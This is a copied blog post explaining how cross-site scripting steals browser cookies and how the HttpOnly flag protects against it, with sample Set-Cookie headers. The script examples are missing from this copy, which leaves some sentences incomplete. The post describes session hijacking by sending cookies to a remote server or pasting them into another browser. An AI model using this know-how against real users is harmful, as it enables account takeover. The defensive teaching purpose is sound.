Protecting Your Cookies: HttpOnly
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
are automagically converted into their harmless encoded equivalents:
It all starts with this bit of script added to a user’s profile page.
That’s right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we’ve already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don’t believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That’s all it takes. It’s quite an eye opener.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
- A modern web browser
- A browser that actually implements HttpOnly correctly
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I’m not sure if the latest versions of Safari do or not. It’s sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn’t exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here’s what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
Date: Tue, 26 Aug 2008 10:51:08 GMT
This isn’t exactly news; Scott Hanselman wrote about HttpOnly a while ago. I’m not sure he understood the implications, as he was quick to dismiss it as “slowing down the average script kiddie for 15 seconds”. In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here’s what we know:
- HttpOnly restricts all access to cookiein IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
- HttpOnly removes cookie information from the response headers in getAllResponseHeaders()in IE7. It should do the same thing in Firefox, but it doesn’t, because there’s a bug.
- XMLHttpObjectsmay only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I — er, I mean, if my friend — had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don’t make you immune from XSS cookie theft, but they raise the bar considerably. It’s practically free, a “set it and forget it” setting that’s bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
article taken from:http://blog.codinghorror.com/protecting-your-cookies-httponly/